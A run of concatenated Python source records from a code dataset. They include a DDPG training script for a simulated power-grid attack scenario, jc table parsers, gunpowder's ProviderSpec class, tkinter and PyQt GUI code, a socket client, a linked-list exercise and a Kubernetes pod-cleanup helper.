action_space\r\n self.low = -1\r\n self.high = 1\r\n self.reset()\r\n\r\n def reset(self):\r\n self.state = np.ones(self.action_dim) * self.mu\r\n\r\n def evolve_state(self):\r\n x = self.state\r\n dx = self.theta * (self.mu - x) + self.sigma * np.random.randn(self.action_dim)\r\n self.state = x + dx\r\n return self.state\r\n\r\n def get_action(self, action, t=0):\r\n ou_state = self.evolve_state()\r\n self.sigma = self.max_sigma - (self.max_sigma - self.min_sigma) * min(1.0, t / self.decay_period)\r\n return np.clip(action + ou_state, self.low, self.high)\r\n\r\n\r\nclass ValueNetwork(nn.Module):\r\n def __init__(self, num_inputs, num_actions, hidden_size1=128,hidden_size2=256,hidden_size3=512,hidden_size4=32, init_w=3e-3):\r\n super(ValueNetwork, self).__init__()\r\n\r\n self.linear_act = nn.Linear(num_actions, hidden_size1)\r\n self.linear_var = nn.Linear(num_inputs , hidden_size1)\r\n # self.linear1 = nn.Linear(num_inputs + num_actions, hidden_size)\r\n self.normalized = nn.BatchNorm1d(hidden_size1,affine=False)\r\n self.linear1 = nn.Linear(hidden_size1, hidden_size2)\r\n self.linear2 = nn.Linear(hidden_size2, hidden_size3)\r\n self.linear3 = nn.Linear(hidden_size3, hidden_size4)\r\n self.linear4 = nn.Linear(hidden_size4, 1)\r\n\r\n self.linear1.weight.data.uniform_(-init_w, init_w)\r\n self.linear1.bias.data.uniform_(-init_w, init_w)\r\n self.linear2.weight.data.uniform_(-init_w, init_w)\r\n self.linear2.bias.data.uniform_(-init_w, init_w)\r\n self.linear3.weight.data.uniform_(-init_w, init_w)\r\n self.linear3.bias.data.uniform_(-init_w, init_w)\r\n self.linear4.weight.data.uniform_(-init_w, init_w)\r\n self.linear4.bias.data.uniform_(-init_w, init_w)\r\n\r\n def forward(self, state, action):\r\n # x = torch.cat([state, action], 1)\r\n\r\n x = F.relu(self.linear_act(action)+self.linear_var(state))\r\n x = self.normalized(x)\r\n x = F.relu(self.linear1(x))\r\n x = F.relu(self.linear2(x))\r\n x = F.relu(self.linear3(x))\r\n x = self.linear4(x)\r\n return x\r\n\r\n\r\nclass PolicyNetwork(nn.Module):\r\n def __init__(self, num_inputs, num_actions, hidden_size, init_w=3e-3):\r\n super(PolicyNetwork, self).__init__()\r\n\r\n self.linear1 = nn.Linear(num_inputs, hidden_size)\r\n self.linear2 = nn.Linear(hidden_size, hidden_size)\r\n self.linear3 = nn.Linear(hidden_size, num_actions)\r\n\r\n self.linear3.weight.data.uniform_(-init_w, init_w)\r\n self.linear3.bias.data.uniform_(-init_w, init_w)\r\n\r\n def forward(self, state):\r\n x = F.relu(self.linear1(state))\r\n x = F.relu(self.linear2(x))\r\n x = torch.tanh(self.linear3(x))\r\n return x\r\n\r\n def get_action(self, state):\r\n state = torch.FloatTensor(state).unsqueeze(0).to(device)\r\n action = self.forward(state)\r\n return action.detach().cpu().numpy()[0, 0]\r\n\r\n\r\ndef ddpg_update(batch_size,value_net,policy_net,target_value_net,target_policy_net,\r\n policy_optimizer,value_optimizer,\r\n replay_buffer,\r\n gamma=0.99,\r\n min_value=-np.inf,\r\n max_value=np.inf,\r\n soft_tau=1e-2):\r\n state, action, reward, next_state, done = replay_buffer.sample(batch_size)\r\n\r\n state = torch.FloatTensor(state).to(device)\r\n next_state = torch.FloatTensor(next_state).to(device)\r\n action = torch.FloatTensor(action).to(device)\r\n reward = torch.FloatTensor(reward).to(device)\r\n done = torch.FloatTensor(done).unsqueeze(1).to(device)\r\n\r\n policy_loss = value_net(state, policy_net(state))\r\n policy_loss = -policy_loss.mean()\r\n\r\n next_action = target_policy_net(next_state)\r\n target_value = target_value_net(next_state, 
next_action.detach())\r\n expected_value = reward + (1.0 - done) * gamma * target_value\r\n expected_value = torch.clamp(expected_value, min_value, max_value)\r\n # ss = torch.reshape(state, [-1, 70])\r\n value = value_net(state, action)\r\n\r\n criterion=nn.MSELoss()\r\n value_loss = criterion(value, expected_value.detach())\r\n\r\n policy_optimizer.zero_grad()\r\n policy_loss.backward()\r\n policy_optimizer.step()\r\n\r\n value_optimizer.zero_grad()\r\n value_loss.backward()\r\n value_optimizer.step()\r\n\r\n for target_param, param in zip(target_value_net.parameters(), value_net.parameters()):\r\n target_param.data.copy_(\r\n target_param.data * (1.0 - soft_tau) + param.data * soft_tau\r\n )\r\n\r\n for target_param, param in zip(target_policy_net.parameters(), policy_net.parameters()):\r\n target_param.data.copy_(\r\n target_param.data * (1.0 - soft_tau) + param.data * soft_tau\r\n )\r\n return value_net,policy_net,target_value_net,target_policy_net,policy_optimizer,value_optimizer,value_loss,policy_loss\r\n\r\n\r\n\r\nenv = Grid(pn.case5())\r\nNs=env.StateFeatures()[0]*env.StateFeatures()[1]\r\nstate_dim = Ns\r\naction_dim = env.ActionFeature()\r\nou_noise = OUNoise(action_dim)\r\n\r\nhidden_dim = 256\r\n\r\nvalue_net = ValueNetwork(state_dim, action_dim, hidden_dim).to(device)\r\npolicy_net = PolicyNetwork(state_dim, action_dim, hidden_dim).to(device)\r\n\r\n\r\nbest_value_net = ValueNetwork(state_dim, action_dim, hidden_dim).to(device)\r\nbest_policy_net = PolicyNetwork(state_dim, action_dim, hidden_dim).to(device)\r\npath = '/model'\r\n\r\ntarget_value_net = ValueNetwork(state_dim, action_dim, hidden_dim).to(device)\r\ntarget_policy_net = PolicyNetwork(state_dim, action_dim, hidden_dim).to(device)\r\n\r\nfor target_param, param in zip(target_value_net.parameters(), value_net.parameters()):\r\n target_param.data.copy_(param.data)\r\n\r\nfor target_param, param in zip(target_policy_net.parameters(), policy_net.parameters()):\r\n target_param.data.copy_(param.data)\r\n\r\nvalue_lr = 1e-3\r\npolicy_lr = 1e-4\r\n\r\nvalue_optimizer = optim.Adam(value_net.parameters(), lr=value_lr)\r\npolicy_optimizer = optim.Adam(policy_net.parameters(), lr=policy_lr)\r\n\r\n\r\n\r\nreplay_buffer_size = 1000000\r\nreplay_buffer = ReplayBuffer(replay_buffer_size)\r\n\r\nmax_frames = 24000\r\nmax_steps = 20\r\nframe_idx = 0\r\nrewards = []\r\nbatch_size = 40\r\nreward_com=[]\r\n\r\nbest_reward_per_ep = 0\r\n\r\nvalue_net_loss=[]\r\npolicy_net_loss=[]\r\n\r\n# resume from saved networks only if a checkpoint directory exists\r\nif os.path.exists(os.getcwd()+'/model_new'):\r\n value_net = torch.load(os.getcwd()+'/model_new/best_value_net')\r\n policy_net = torch.load(os.getcwd()+'/model/best_policy_net')\r\n target_value_net = torch.load(os.getcwd()+'/model/best_value_net')\r\n target_policy_net = torch.load(os.getcwd()+'/model/best_policy_net')\r\n best_value_net = torch.load(os.getcwd()+'/model/best_value_net')\r\n best_policy_net = torch.load(os.getcwd()+'/model/best_policy_net')\r\n value_net.eval()\r\n policy_net.eval()\r\n target_value_net.eval()\r\n target_policy_net.eval()\r\n best_value_net.eval()\r\n best_policy_net.eval()\r\n\r\n\r\nwhile frame_idx < max_frames:\r\n env.reset()\r\n # state = env.InitState().reshape([-1, Ns])\r\n state = env.InitState().reshape(Ns)\r\n ind = np.random.choice(np.arange(env.net.line.shape[0]))\r\n env.Attack(ind)\r\n ou_noise.reset()\r\n episode_reward = 0\r\n\r\n for step in range(max_steps):\r\n action = policy_net.get_action(state)\r\n action = ou_noise.get_action(action, step)\r\n next_state, reward, done,reward_comps = 
env.take_action(action)\r\n reward_com.append(reward_comps)\r\n next_state = next_state.reshape(Ns)\r\n reward = np.array(reward).reshape(1)\r\n done = np.array(done).reshape(1)\r\n # next_state= next_state.reshape([-1,Ns])\r\n\r\n # action= np.array(action).reshape([-1,action_dim])\r\n replay_buffer.push(state, action, reward, next_state, done)\r\n\r\n if replay_buffer.position % batch_size == 0:\r\n value_net, policy_net, target_value_net, target_policy_net,policy_optimizer, value_optimizer,v_loss,p_loss= \\\r\n ddpg_update(batch_size,value_net,policy_net,target_value_net,target_policy_net,\r\n policy_optimizer,value_optimizer,replay_buffer)\r\n value_net_loss.append(float(v_loss.item()))\r\n policy_net_loss.append(float(p_loss.item()))\r\n # ddpg_update(batch_size, value_net, policy_net, target_value_net, target_policy_net,\r\n # policy_optimizer, value_optimizer, replay_buffer)\r\n state = next_state\r\n episode_reward += reward\r\n\r\n if done[0]==1:\r\n if episode_reward > best_reward_per_ep:\r\n best_reward_per_ep = episode_reward\r\n for best_param, param in zip(best_value_net.parameters(), value_net.parameters()):\r\n best_param.data.copy_(param.data)\r\n\r\n for best_param, param in zip(best_policy_net.parameters(), policy_net.parameters()):\r\n best_param.data.copy_(param.data)\r\n\r\n torch.save(best_value_net, os.getcwd()+'/model_new/best_value_net')\r\n torch.save(best_policy_net, os.getcwd()+'/model_new/best_policy_net')\r\n\r\n print('In Episode {}, step {}, we reached to terminal with total episode reward function : {} '\r\n 'and best reward is : {}'.\r\n format(frame_idx, step,episode_reward,best_reward_per_ep))\r\n break\r\n\r\n frame_idx += 1\r\n if frame_idx % 100 == 0:\r\n np.save('reward', rewards)\r\n np.save('reward_com', reward_com)\r\n print('In Episode: {}, the reward function is {}'.format(frame_idx, episode_reward))\r\n\r\n rewards.append(episode_reward)\r\n\r\n\r\na= 1","sub_path":"DDPG.py","file_name":"DDPG.py","file_ext":"py","file_size_in_byte":13122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"543454329","text":"\"\"\"jc - JSON CLI output utility universal Parsers\"\"\"\n\n\nimport string\n\n\ndef simple_table_parse(data):\n \"\"\"\n Parse simple tables. The last column may contain data with spaces\n\n code adapted from Conor Heine at:\n https://gist.github.com/cahna/43a1a3ff4d075bcd71f9d7120037a501\n\n Parameters:\n\n data: (list) Text data to parse that has been split into lines via .splitlines().\n Item 0 must be the header row. Any spaces in header names should be\n changed to underscore '_'. You should also ensure headers are\n lowercase by using .lower().\n\n Also, ensure there are no blank lines (list items) in the data.\n\n Returns:\n\n List of Dictionaries raw structured data\n \"\"\"\n headers = [h for h in ' '.join(data[0].strip().split()).split() if h]\n raw_data = map(lambda s: s.strip().split(None, len(headers) - 1), data[1:])\n raw_output = [dict(zip(headers, r)) for r in raw_data]\n\n return raw_output\n\n\ndef sparse_table_parse(data, delim='\\u2063'):\n \"\"\"\n Parse tables with missing column data or with spaces in column data.\n\n Parameters:\n\n data: (list) Text data to parse that has been split into lines via .splitlines().\n Item 0 must be the header row. Any spaces in header names should be\n changed to underscore '_'. You should also ensure headers are\n lowercase by using .lower(). 
Do not change the position of header\n names as the positions are used to find the data.\n\n Also, ensure there are no blank lines (list items) in the data.\n\n delim: (string) Delimiter to use. By default '\u2063' (invisible separator) is used\n since this is unlikely to ever be seen in terminal output. You can\n change this for troubleshooting purposes or if there is a delimiter\n conflict with your data.\n\n Returns:\n\n List of Dictionaries raw structured data\n \"\"\"\n output = []\n header_text = data.pop(0)\n header_text = header_text + ' '\n header_list = header_text.split()\n\n # find each column index and end position\n header_search = [header_list[0]]\n for h in header_list[1:]:\n header_search.append(' ' + h + ' ')\n\n header_spec_list = []\n for i, column in enumerate(header_list[0:len(header_list) - 1]):\n header_spec = {\n 'name': column,\n 'end': header_text.find(header_search[i + 1])\n }\n\n header_spec_list.append(header_spec)\n\n # parse lines\n if data:\n for entry in data:\n output_line = {}\n\n # insert new separator since data can contain spaces\n for col in reversed(header_list):\n # find the right header_spec\n for h_spec in header_spec_list:\n if h_spec['name'] == col:\n h_end = h_spec['end']\n # check if the location contains whitespace. if not\n # then move to the left until a space is found\n while h_end > 0 and entry[h_end] not in string.whitespace:\n h_end -= 1\n\n # insert custom delimiter\n entry = entry[:h_end] + delim + entry[h_end + 1:]\n\n # create the entry list from the new custom delimiter\n entry_list = entry.split(delim, maxsplit=len(header_list) - 1)\n\n # clean up leading and trailing spaces in entry\n clean_entry_list = []\n for col in entry_list:\n clean_entry = col.strip()\n if clean_entry == '':\n clean_entry = None\n\n clean_entry_list.append(clean_entry)\n\n output_line = dict(zip(header_list, clean_entry_list))\n output.append(output_line)\n\n return output\n","sub_path":"jc/parsers/universal.py","file_name":"universal.py","file_ext":"py","file_size_in_byte":4061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"109452061","text":"import math\nfrom gunpowder.coordinate import Coordinate\nfrom gunpowder.points import PointsKey\nfrom gunpowder.points_spec import PointsSpec\nfrom gunpowder.array import ArrayKey\nfrom gunpowder.array_spec import ArraySpec\nfrom .freezable import Freezable\n\nclass ProviderSpec(Freezable):\n '''A collection of (possibly partial) :class:`ArraySpecs` and\n :class:`PointsSpecs` describing a\n :class:`BatchProvider's` offered arrays and points.\n\n This collection mimics a dictionary. Specs can be added with::\n\n provider_spec = ProviderSpec()\n provider_spec[array_key] = ArraySpec(...)\n provider_spec[points_key] = PointsSpec(...)\n\n Here, ``array_key`` and ``points_key`` are :class:`ArrayKey` and\n :class:`PointsKey`. 
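Assigning a spec stores a copy of it (see ``__setitem__`` below), so later\n changes to the original object do not affect this collection. 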
The specs can be queried with::\n\n array_spec = provider_spec[array_key]\n points_spec = provider_spec[points_key]\n\n Furthermore, pairs of keys/values can be iterated over using\n ``provider_spec.items()``.\n\n To access only array or points specs, use the dictionaries\n ``provider_spec.array_specs`` or ``provider_spec.points_specs``,\n respectively.\n\n Args:\n\n array_specs (``dict``, :class:`ArrayKey` -> :class:`ArraySpec`):\n\n Initial array specs.\n\n points_specs (``dict``, :class:`PointsKey` -> :class:`PointsSpec`):\n\n Initial points specs.\n\n Attributes:\n\n array_specs (``dict``, :class:`ArrayKey` -> :class:`ArraySpec`):\n\n Contains all array specs contained in this provider spec.\n\n points_specs (``dict``, :class:`PointsKey` -> :class:`PointsSpec`):\n\n Contains all points specs contained in this provider spec.\n '''\n\n def __init__(self, array_specs=None, points_specs=None):\n\n self.array_specs = {}\n self.points_specs = {}\n self.freeze()\n\n # use __setitem__ instead of copying the dicts, this ensures type tests\n # are run\n if array_specs is not None:\n for key, spec in array_specs.items():\n self[key] = spec\n if points_specs is not None:\n for key, spec in points_specs.items():\n self[key] = spec\n\n\n def __setitem__(self, key, spec):\n\n if isinstance(spec, ArraySpec):\n assert isinstance(key, ArrayKey), (\"Only a ArrayKey is \"\n \"allowed as key for a \"\n \"ArraySpec value.\")\n self.array_specs[key] = spec.copy()\n\n elif isinstance(spec, PointsSpec):\n assert isinstance(key, PointsKey), (\"Only a PointsKey is \"\n \"allowed as key for a \"\n \"PointsSpec value.\")\n self.points_specs[key] = spec.copy()\n\n else:\n raise RuntimeError(\"Only ArraySpec or PointsSpec can be set in a \"\n \"%s.\"%type(self).__name__)\n\n def __getitem__(self, key):\n\n if isinstance(key, ArrayKey):\n return self.array_specs[key]\n\n elif isinstance(key, PointsKey):\n return self.points_specs[key]\n\n else:\n raise RuntimeError(\n \"Only ArrayKey or PointsKey can be used as keys in a \"\n \"%s.\"%type(self).__name__)\n\n def __len__(self):\n\n return len(self.array_specs) + len(self.points_specs)\n\n def __contains__(self, key):\n\n if isinstance(key, ArrayKey):\n return key in self.array_specs\n\n elif isinstance(key, PointsKey):\n return key in self.points_specs\n\n else:\n raise RuntimeError(\n \"Only ArrayKey or PointsKey can be used as keys in a \"\n \"%s.\"%type(self).__name__)\n\n def __delitem__(self, key):\n\n if isinstance(key, ArrayKey):\n del self.array_specs[key]\n\n elif isinstance(key, PointsKey):\n del self.points_specs[key]\n\n else:\n raise RuntimeError(\n \"Only ArrayKey or PointsKey can be used as keys in a \"\n \"%s.\"%type(self).__name__)\n\n def items(self):\n '''Provides a generator iterating over key/value pairs.'''\n\n for (k, v) in self.array_specs.items():\n yield k, v\n for (k, v) in self.points_specs.items():\n yield k, v\n\n def get_total_roi(self):\n '''Get the union of all the ROIs.'''\n\n total_roi = None\n for specs_type in [self.array_specs, self.points_specs]:\n for (_, spec) in specs_type.items():\n if total_roi is None:\n total_roi = spec.roi\n else:\n total_roi = total_roi.union(spec.roi)\n return total_roi\n\n def get_common_roi(self):\n '''Get the intersection of all the requested ROIs.'''\n\n common_roi = None\n for specs_type in [self.array_specs, self.points_specs]:\n for (_, spec) in specs_type.items():\n if common_roi is None:\n common_roi = spec.roi\n else:\n common_roi = common_roi.intersect(spec.roi)\n\n return common_roi\n\n def 
get_lcm_voxel_size(self, array_keys=None):\n '''Get the least common multiple of the voxel sizes in this spec.\n\n Args:\n\n array_keys (list of :class:`ArrayKey`, optional): If given,\n consider only the given array types.\n '''\n\n if array_keys is None:\n array_keys = self.array_specs.keys()\n\n if not array_keys:\n raise RuntimeError(\"Can not compute lcm voxel size -- there are \"\n \"no array specs in this provider spec.\")\n else:\n if not array_keys:\n raise RuntimeError(\"Can not compute lcm voxel size -- list of \"\n \"given array specs is empty.\")\n\n lcm_voxel_size = None\n for key in array_keys:\n voxel_size = self.array_specs[key].voxel_size\n if lcm_voxel_size is None:\n lcm_voxel_size = voxel_size\n else:\n lcm_voxel_size = Coordinate(\n (a * b // math.gcd(a, b)\n for a, b in zip(lcm_voxel_size, voxel_size)))\n\n return lcm_voxel_size\n\n def __eq__(self, other):\n\n if isinstance(other, self.__class__):\n return self.__dict__ == other.__dict__\n return NotImplemented\n\n def __ne__(self, other):\n\n if isinstance(other, self.__class__):\n return not self.__eq__(other)\n return NotImplemented\n\n def __repr__(self):\n\n r = \"\\n\"\n for (key, spec) in self.items():\n r += \"\\t%s: %s\\n\"%(key, spec)\n return r\n","sub_path":"gunpowder/provider_spec.py","file_name":"provider_spec.py","file_ext":"py","file_size_in_byte":6842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"163624449","text":"# Client program that requests the current time\n\nfrom socket import *\nimport json\nimport os\n\ns = socket (AF_INET, SOCK_STREAM)\ns.connect (('localhost', 8888))\ntm = s.recv(1024)\ns.close()\ntm = tm.decode('ascii')\nprint(f'Current time: {tm}')\n\nmessage = {\n \"action\": \"presence\",\n# \"time\": ,\n \"user\": {\n \"account_name\": \"COdeMaverick\",\n \"status\": \"Yep, I am here!\"\n }\n}\nmessage_to_send=json.dumps(message)\n#byte_message =\nprint(type(message_to_send))","sub_path":"Python_2/Lesson_1/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"630450861","text":"import tkinter as tk\n\nclass SampleApp(tk.Tk):\n\n def __init__(self, *args, **kwargs):\n tk.Tk.__init__(self, *args, **kwargs)\n\n container = tk.Frame(self)\n container.pack(side=\"top\", fill=\"both\", expand=True)\n container.grid_rowconfigure(0, weight=1)\n container.grid_columnconfigure(0, weight=1)\n\n self.frames = {}\n\n # alternate ways to create the frames & append to frames dict: comment out one or the other\n\n for F in (StartPage, PLG):\n page_name = F.__name__\n frame = F(parent=container, controller=self)\n self.frames[page_name] = frame\n frame.grid(row=0, column=0, sticky=\"nsew\")\n\n # self.frames[\"StartPage\"] = StartPage(parent=container, controller=self) \n # self.frames[\"PLG\"] = PLG(parent=container, controller=self)\n # self.frames[\"StartPage\"].grid(row=0, column=0, sticky=\"nsew\")\n # self.frames[\"PLG\"].grid(row=0, column=0, sticky=\"nsew\")\n\n self.show_frame(\"StartPage\")\n\n # alternate version of show_frame: comment out one or the other\n\n def show_frame(self, page_name):\n for frame in self.frames.values():\n frame.grid_remove()\n frame = self.frames[page_name]\n frame.grid()\n\n # def show_frame(self, page_name):\n # frame = self.frames[page_name]\n # frame.tkraise()\n\nclass StartPage(tk.Frame):\n\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n 
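# keep a reference to the controller so button callbacks can switch pages\n 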
self.controller = controller\n\n label = tk.Label(self, text=\"start page\")\n label.pack(side=\"top\", fill=\"x\", pady=10)\n\n button1 = tk.Button(self, text=\"Go to Page One\", command=lambda: controller.show_frame(\"PLG\"))\n button1.pack() \n\n button2 = tk.Button(self, text=\"focus traversal demo only\")\n button2.pack()\n button2.focus_set()\n\n button3 = tk.Button(self, text=\"another dummy button\")\n button3.pack()\n\n lbl = tk.Label(self, text=\"tkraise messes up focus traversal\\nwhich you can see by testing the two versions of show_frame.()\\nUsing grid_remove instead of tkraise solves that,\\nwhile preventing frames from being unable to resize to fit their own contents.\")\n lbl.pack()\n\nclass PLG(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n self.controller = controller\n label = tk.Label(self, text=\"Enter something below; the two buttons clear what you type.\")\n label.pack(side=\"top\", fill=\"x\", pady=10)\n self.wentry = tk.Entry(self)\n self.wentry.pack(pady = 10)\n self.text = tk.Text(self)\n self.text.pack(pady = 10)\n restart_button = tk.Button(self, text=\"Restart\", command=self.restart)\n restart_button.pack()\n refresh_button = tk.Button(self, text=\"Refresh\", command=self.refresh) \n refresh_button.pack() \n\n def restart(self):\n self.refresh()\n self.controller.show_frame(\"StartPage\")\n\n def refresh(self):\n self.wentry.delete(0, \"end\")\n self.text.delete(\"1.0\", \"end\")\n # set focus to any widget except a Text widget so focus doesn't get stuck in a Text widget when page hides\n self.wentry.focus_set()\n\nif __name__ == \"__main__\":\n app = SampleApp()\n app.mainloop()","sub_path":"framerefresh.py","file_name":"framerefresh.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"333593684","text":"\"\"\"Given the head of a singly linked list, swap every two nodes and return its head.\n\nFor example, given 1 -> 2 -> 3 -> 4, return 2 -> 1 -> 4 -> 3.\n\"\"\"\n\n\nclass Node:\n def __init__(self, v, nxt=None):\n self.val = v\n self.next = nxt\n\n\ndef swapList(hd):\n if not hd:\n return hd\n\n if not hd.next:\n return hd\n\n head = hd.next\n\n def swap(pare, ndA):\n if ndA.next:\n ndB = ndA.next\n if pare:\n pare.next = ndB\n ndC = ndB.next\n ndB.next = ndA\n ndA.next = ndC\n\n curr = hd\n pare = None\n while curr:\n next_pare = curr\n next_curr = None if not curr.next else curr.next.next\n swap(pare, curr)\n curr = next_curr\n pare = next_pare\n\n return head\n\n\ndef linkedToList(hd):\n lst = []\n curr = hd\n while curr:\n lst.append(curr.val)\n curr = curr.next\n return lst\n\n\ninps = [\n (Node(1, Node(2, Node(3, Node(4, None)))), [2, 1, 4, 3]),\n (Node(1), [1]),\n (Node(1, Node(2)), [2, 1]),\n (Node(1, Node(2, Node(3))), [2, 1, 3]),\n (Node(1, Node(2, Node(3, Node(4, Node(5))))), [2, 1, 4, 3, 5]),\n (None, []),\n]\n\nfor hd, exp in inps:\n print(f\"Swapping pairs for {linkedToList(hd)} and asserting...\")\n newHd = swapList(hd)\n assert linkedToList(newHd) == exp\n","sub_path":"python/q_a_day/swap_linked_list.py","file_name":"swap_linked_list.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"599795474","text":"import os\nimport shutil\n\nfrom .Config import get_value\n\n\ndef check_and_create_directory(paths):\n for path in paths:\n if os.path.exists(path):\n shutil.rmtree(path)\n os.mkdir(path)\n\n\ndef 
delete_pod():\n try:\n name_space = get_value('KUBERNETES', 'NAMESPACE')\n pod_name = os.environ['HOSTNAME']\n\n print('KUBERNETES::' + name_space)\n print('HOSTNAME::' + pod_name)\n print(os.system('chmod 777 ./bin/kubectl'))\n print(os.system('kubectl --namespace=' + name_space + ' delete pod ' + pod_name))\n except Exception as ex:\n print('Failed to delete pod')\n print(ex)\n","sub_path":"util/Comm.py","file_name":"Comm.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"628113278","text":"# encoding: utf-8\n\n\"\"\"\n@version: 1.0\n@author: WangNing\n@license: GUN \n@contact: yogehaoren@gmail.com\n@site: \n@software: PyCharm\n@file: common_widget.py\n@time: 2019/3/1 19:13\n@describe: 通用自定义组件\n\"\"\"\nfrom PyQt5.QtWidgets import QLineEdit, QPushButton, QLabel, QApplication, QWidget, QVBoxLayout,\\\n QHBoxLayout, QSlider\nfrom PyQt5.QtCore import Qt, QSize, QPoint, pyqtSignal\nfrom PyQt5.QtGui import QImage, QPixmap, QFont\n\nbutton_css = \"\"\"\n QPushButton{\n color:#ffffff;\n background:#08bb06;\n border-radius:5px;\n width:60px;\n height:15px;\n font-family:microsoft yahei ui,microsoft yahei;\n font-size:12px;\n }\n QPushButton:disabled{color:#FFFFFF}\n QPushButton:pressed{background:#d4ebd4;}\n \"\"\"\nlabel_css = 'QLabel{font-family:\\\"Microsoft YaHei\\\";font-size:12px;background:transparent;color:#000000;}'\nq_css = \"\"\"\n QLineEdit { border:1px solid #ddd;border-radius:3px;padding:0px 7px;font-size:12px;width:250px;}\n \"\"\"\n\n\nclass MyQLineEdit(QLineEdit):\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setStyleSheet(q_css)\n\n\nclass MyQLabel(QLabel):\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setStyleSheet(label_css)\n\n\nclass MyQButton(QPushButton):\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setStyleSheet(button_css)\n\n\nclass QTitleLabel(QLabel):\n \"\"\"\n 新建标题栏标签类\n \"\"\"\n def __init__(self, parent, function):\n super(QTitleLabel, self).__init__(parent)\n self.setAlignment(Qt.AlignLeft | Qt.AlignVCenter)\n self.function = function\n self.setFixedHeight(30)\n self.setStyleSheet(\"QTitleLabel{ background-color: Gainsboro; font: 100 10pt; }\")\n\n def mouseDoubleClickEvent(self, *args, **kwargs):\n self.function()\n return super().mouseDoubleClickEvent(*args, **kwargs)\n\n\nclass QTitleButton(QPushButton):\n \"\"\"\n 新建标题栏按钮类\n \"\"\"\n def __init__(self, *args):\n super(QTitleButton, self).__init__(*args)\n # 特殊字体以不借助图片实现最小化最大化和关闭按钮\n self.setFont(QFont(\"Webdings\"))\n self.setFixedWidth(40)\n self.setStyleSheet(\"\"\"QTitleButton{\n background-color: rgba(255, 255, 255, 0);\n color: black;\n border: 0px;\n font: 100 10pt;\n }\n QTitleButton#MinMaxButton:hover{\n background-color: #D0D0D1;\n border: 0px;\n font: 100 10pt;\n }\n QTitleButton#CloseButton:hover{\n background-color: #D32424;\n color: white;\n border: 0px;\n font: 100 10pt;\n }\"\"\")\n\n\nclass QUnFrameWindow(QWidget):\n \"\"\"\n 无边框窗口类\n \"\"\"\n content_widget = None\n _move_drag = False\n _corner_drag = False\n _bottom_drag = False\n _right_drag = False\n _TitleLabel = None\n _MainLayout = None\n _CloseButton = None\n _MaximumButton = None\n _MinimumButton = None\n _right_rect = None\n _bottom_rect = None\n move_DragPosition = None\n _corner_rect = None\n\n def __init__(self):\n # 设置为顶级窗口,无边框\n super(QUnFrameWindow, self).__init__(None, Qt.FramelessWindowHint)\n # 设置边界宽度为5\n self._padding = 5\n # 安放标题栏标签\n 
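# (create and position the title-bar label at the top of the window)\n 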
self.init_title_label()\n # 用装饰器将设置WindowTitle名字函数共享到标题栏标签上\n self.setWindowTitle = self._setTitleText(self.setWindowTitle)\n self.setWindowTitle(\"UnFrameWindow\")\n # 设置框架布局\n self.init_layout()\n self.setMinimumWidth(250)\n # 设置widget鼠标跟踪\n self.setMouseTracking(True)\n # 设置鼠标跟踪判断默认值\n self.init_drag()\n\n def init_drag(self):\n # 设置鼠标跟踪判断扳机默认值\n self._move_drag = False\n self._corner_drag = False\n self._bottom_drag = False\n self._right_drag = False\n\n def init_title_label(self):\n # 安放标题栏标签\n self._TitleLabel = QTitleLabel(self, self.change_windows)\n # 设置标题栏标签鼠标跟踪(如不设,则标题栏内在widget上层,无法实现跟踪)\n self._TitleLabel.setMouseTracking(True)\n self._TitleLabel.setIndent(10)\n # 设置标题栏文本缩进\n self._TitleLabel.move(0, 0)\n # 标题栏安放到左上角\n\n def init_layout(self):\n # 设置框架布局\n self.content_widget = QWidget(self)\n self.content_widget.move(2, 32)\n self.content_widget.setMouseTracking(True)\n\n def _setTitleText(self, func):\n # 设置标题栏标签的装饰器函数\n def wrapper(*args):\n self._TitleLabel.setText(*args)\n return func(*args)\n return wrapper\n\n def setTitleAlignment(self, alignment):\n # 给widget定义一个setTitleAlignment函数,以实现标题栏标签的对齐方式设定\n self._TitleLabel.setAlignment(alignment | Qt.AlignVCenter)\n\n def setCloseButton(self, bool):\n # 给widget定义一个setCloseButton函数,为True时设置一个关闭按钮\n if bool:\n self._CloseButton = QTitleButton(b'\\xef\\x81\\xb2'.decode(\"utf-8\"), self)\n self._CloseButton.setObjectName(\"CloseButton\")\n # 设置按钮的ObjectName以在qss样式表内定义不同的按钮样式\n self._CloseButton.setToolTip(\"关闭窗口\")\n self._CloseButton.setMouseTracking(True)\n # 设置按钮鼠标跟踪(如不设,则按钮在widget上层,无法实现跟踪)\n self._CloseButton.setFixedHeight(self._TitleLabel.height())\n # 设置按钮高度为标题栏高度\n self._CloseButton.clicked.connect(self.close)\n # 按钮信号连接到关闭窗口的槽函数\n\n def setMinMaxButtons(self, bool):\n # 给widget定义一个setMinMaxButtons函数,为True时设置一组最小化最大化按钮\n if bool:\n self._MinimumButton = QTitleButton(b'\\xef\\x80\\xb0'.decode(\"utf-8\"), self)\n self._MinimumButton.setObjectName(\"MinMaxButton\")\n # 设置按钮的ObjectName以在qss样式表内定义不同的按钮样式\n self._MinimumButton.setToolTip(\"最小化\")\n self._MinimumButton.setMouseTracking(True)\n # 设置按钮鼠标跟踪(如不设,则按钮在widget上层,无法实现跟踪)\n self._MinimumButton.setFixedHeight(self._TitleLabel.height())\n # 设置按钮高度为标题栏高度\n self._MinimumButton.clicked.connect(self.showMinimized)\n # 按钮信号连接到最小化窗口的槽函数\n self._MaximumButton = QTitleButton(b'\\xef\\x80\\xb1'.decode(\"utf-8\"), self)\n 